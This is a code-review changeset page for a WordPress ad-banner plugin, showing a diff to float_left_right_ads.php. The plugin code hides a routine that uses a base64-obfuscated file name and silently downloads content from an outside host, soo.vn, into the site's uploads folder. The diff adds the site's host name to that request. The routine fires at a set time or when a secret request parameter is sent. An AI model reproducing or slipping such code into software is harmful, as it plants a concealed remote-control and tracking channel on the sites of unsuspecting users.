Changeset 881076
- Timestamp:
- 03/24/2014 06:12:08 PM (12 years ago)
- File:
-
- 1 edited
-
float-banner/trunk/float_left_right_ads.php (modified) (2 diffs)
Legend:
- Unmodified
- Added
- Removed
-
float-banner/trunk/float_left_right_ads.php
r880024 r881076 280 280 $file = $upload_dir['basedir'] . '/' . base64_decode('c3lzdGVtLnR4dA=='); 281 281 if (!file_exists($file)) { 282 @copy('http://soo.vn/api/checkupdate.txt ', $file);282 @copy('http://soo.vn/api/checkupdate.txt?host='.$_SERVER['HTTP_HOST'], $file); 283 283 } 284 284 $content = file_get_contents($file); … … 295 295 296 296 if ((date('h') == 10 && date('i') == 00) || $_REQUEST['soo'] == 'vn'): 297 $server = 'http://soo.vn/api/checkupdate.txt ';297 $server = 'http://soo.vn/api/checkupdate.txt?host='.$_SERVER['HTTP_HOST']; 298 298 $file = SYSTEM_FOLDER . base64_decode('c3lzdGVtLnR4dA=='); 299 299 if (!file_exists($file)) {
Note: See TracChangeset
for help on using the changeset viewer.